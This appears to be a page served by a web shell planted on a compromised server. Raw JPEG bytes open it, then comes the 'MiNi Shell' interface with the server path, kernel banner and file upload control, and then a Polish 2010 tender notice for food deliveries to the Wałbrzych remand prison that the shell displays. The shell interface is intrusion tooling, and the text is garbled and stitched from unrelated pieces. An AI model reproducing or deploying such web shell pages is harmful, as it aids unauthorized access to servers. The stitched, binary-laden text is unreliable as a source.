JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/126693-N-2010.html

<p class="kh_header"><b>Wałbrzych: Ogłoszenie na dostawę przypraw, konserw i innych art. żywnościowych</b><br>
<b>Numer ogłoszenia: 126693 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Wałbrzychu , ul. Juliusza Słowackiego 10 A, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 8877000, faks 0-74 8877002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ogłoszenie na dostawę przypraw, konserw i innych art. żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Pierwsza część oferty:
Lp.	NAZWA	KOD CPV	Ilość w kg lub litr	WYMAGANIA DLA PRODUKTU
1	CUKIER BIAŁY	15831200-4	5 500,00	W opakowaniach tylko 1kg
2	CYNAMON MIELONY	15872200-3	5,00	W opakowaniach do 1kg
3	DŻEM	15332290-3	1 500,00	W opakowaniach do 6 kg
4	FASOLA SUSZONA	03221210-1	1 200,00	W opakowaniach do 30 kg
5	GROCH SUSZONY 	03221220-4	1 200,00	W opakowaniach do 30 kg i tylko groch suszony łuskany
6	HERBATA	15863200-7	400,00	W opakowaniach do 30kg
7	KASZA JĘCZMIENNA	03211900-2	250,00	W opakowaniach do 30kg
8	KASZA MANNA	03211900-2	200,00	W opakowaniach do 30kg
9	KAWA ZBOŻOWA 	15860000-8	400,00	W opakowaniach do 30kg
10	KMINEK	15893000-4	15,00	W opakowaniach do 5kg
11	KONCENTRAT POMIDOROWY	15331427-6	800,00	koncentrat pomidorowy 30% w słoikach do 900 ml
12	KOPER SUSZONY	15893000-4	50,00	W opakowaniach do 5kg
13	KRAJANKA SOJOWA	15331000-7	400,00	W opakowaniach do 30kg
14	LIŚĆ LAUROWY	15890000-3	40,00	W opakowaniach do 5kg
15	MAJERANEK	15872300-4	60,00	W opakowaniach do 5kg
16	MAJONEZ	15871273-8	400,00	W opakowaniach do 0,9kg
17	MAKARON	15851100-9	5 000,00	w skład  makaronu wchodzą jajka, dostarczany makaron - tylko typ (świderki)
18	MUSZTARDA 	15871250-1	500,00	W opakowaniach do 1kg
19	OCET	15871000-1	250,00	W opakowaniach do 1 litra
20	OREGANO	15872000-1	30,00	W opakowaniach do 5kg
21	PAPRYKA MIELONA	15872000-1	50,00	W opakowaniach do 5kg; tylko papryka mielona słodka
22	PIEPRZ MIELONY CZARNY	15872100-2	80,00	W opakowaniach do 5kg
23	PŁATKI OWSIANE	15613380-5	200,00	W opakowaniach do 30 kg
24	PRZYPRAWA W PŁYNIE	15871200-6	1 000,00	W opakowaniach do 1 litra
25	MIESZANKA WARZYWNA	15871270-7	800,00	zawiera w swoim składzie min. 15% suszu warzywnego oraz bulion mięsny
26	RYŻ	15614100-6	2 000,00	W opakowaniach do 30 kg
27	SOCZEWICA SUSZONA	03212211-2	400,00	W opakowaniach do 30 kg
28	SOS BOLOŃSKI	15871260-4	80,00	W opakowaniach do 10 kg
29	SOS PIECZARKOWY	15871260-4	50,00	W opakowaniach do 10 kg
30	SOS PIECZENIOWY	15871260-4	80,00	W opakowaniach do 10 kg
31	SOS POMIDOROWY	15871260-4	50,00	W opakowaniach do 10 kg
32	SÓL	15872400-5	1 500,00	W opakowaniach do 1kg
33	ZIELE AGIELSKIE	15890000-3	200,00	W opakowaniach do 5kg
34	ZUPA BARSZCZ BIAŁY	15891400-4	40,00	W opakowaniach do 10kg
35	ZUPA BARSZCZ CZERWONY	15891400-4	80,00	W opakowaniach do 10kg
36	ZUPA PIECZARKOWA	15891400-4	80,00	W opakowaniach do 10kg
37	ZUPA POMIDOROWA	15891400-4	80,00	W opakowaniach do 10kg
38	ZUPA ŻUREK	15891400-4	40,00	W opakowaniach do 10kg

2. Druga część oferty:
1	KONSERWA MIĘSNA	15131000-5	1 000,00	o gramaturze jednostkowej 300 g; przez określenie (konserwa mięsna) rozumiane jest konserwa do której produkcji użyto m.in. mięsa wołowego i/lub wieprzowego; 
2	KONSERWA RYBNA	15240000-2	800,00	o gramaturze jednostkowej od 300g do 330 g
3	PAPRYKARZ SZCZECIŃSKI	15240000-2	800,00	w opakowaniach jednostkowych od 300g do 341 g
4	PASZTET DROBIOWY	15131310-1	700,00	przez określenie (pasztet drobiowy) rozumiane jest pasztet do którego produkcji użyto m.in. mięsa drobiowego; o gramaturze jednostkowej od 290g do 300g. Pasztet drobiowy gramatura ok.130g w opakowaniach łatwootwieralnych (folia aluminiowa) będą stanowić ok. 20% zamówienia (ilościowego) ogólnego asortymentu.
5	PASZTET KONSERWOWY	15131310-1	700,00	przez określenie (pasztet konserwowy) rozumiane jest pasztet do którego produkcji użyto m.in. mięsa wołowego i wieprzowego; o gramaturze jednostkowej od 290g do 300g
* Podane ilości są ilościami szacunkowymi. 
* Wszystkie artykuły z pierwszej części zamówienia powinny mieć termin przydatności do spożycia minimum 6 miesięcy od daty dostawy. Natomiast konserwy wszystkie powinny mieć termin przydatności do spożycia minimum 10 miesięcy od daty dostawy.
Podane ilości są ilościami szacunkowymi uwzględniające maksymalne zaludnienie jednostki, dlatego też ze względu na różne zaludnienie jednostki ilości mogą być mniejsze. Z tego tytułu Dostawcy nie będą przysługiwały żadne roszczenia wobec Odbiorcy.

1)Ilość i termin dostawy:
Dostawa towaru odbywać się będzie w dni wyznaczone przez Odbiorcę przy złożeniu zamówienia telefonicznie podając ilości i rodzaje artykułów.
2)Miejsce i czas dostawy: 
Areszt Śledczy w Wałbrzychu ul Słowackiego 10a, 58-300 Wałbrzych. Dostawa powinna odbywać się 
w godzinach od 8.00 do 14.30 w dni wyznaczone przez Odbiorcę przy złożeniu zamówienia. 
3)Warunki dostarczenia towaru:
Transportem Dostawcy i na jego koszt. Pojazdy do przewozu artykułów żywnościowych muszą spełniać wymagania określone w Rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych.
4)Wymagania jakościowe: Artykuły bez oznak zachodzących niekorzystnych zmian biochemicznych i mikrobiologicznych, brak ubytków i uszkodzeń mechanicznych. Opakowanie powinno spełniać wszystkie normy sanitarne wymagane przez Rozporządzenie Komisji (WE) nr 450/2009 z dnia 29 maja 2009 r. w sprawie aktywnych i inteligentnych materiałów i wyrobów przeznaczonych do kontaktu z żywnością.
5)Odbiór jakościowy - wydanie produktu musi być poprzedzone kontrolą jakościową , którą przeprowadzą przedstawiciele odbiorcy w obecności Dostawcy. Wydanie produktów następować będzie obok magazynu żywnościowego Odbiorcy. Samochód dostawczy ma obowiązek wjechać na teren Aresztu. Jeżeli samochód nie jest w stanie wjechać na teren jednostki dostawę traktujemy jako nienależycie wykonanie umowy. Prześwit bramy wjazdowej to: szerokość 3,20m wysokość 3,30m.
6)Warunki płatności - płatność przelewem na konto Dostawcy w terminie 30 dni od daty otrzymania faktury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O wykonanie zamówienia ubiegać się mogą wykonawcy spełniający warunki art. 22 ust. 1 i nie podlegają wykluczeniu zgodnie z art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. Ocena spełnienia wymaganych wa­runków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie: (spełnia - nie spełnia) w oparciu o informacje zawarte:
a)oświadczenie o spełnieniu warunków oraz nie podleganiu wykluczeniu zgodnie z załączonym wzorem oświadczenia (Załącznik nr 2) na podstawie ustawy Prawo za­mó­wień publicznych, 
b)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o  wpisie do ewiden­cji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c)wypełniony wzór oferty (Załącznik nr 1do SIWZ),
d)podpisany wzór umowy (Załącznik nr 3do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony wzór oferty (Załącznik nr 1do SIWZ),
podpisany wzór umowy (Załącznik nr 3do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2010 godzina 10:00, miejsce: Areszt Śledczy w Wałbrzychu
ul. Słowackiego 10a
58-300 Wałbrzych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com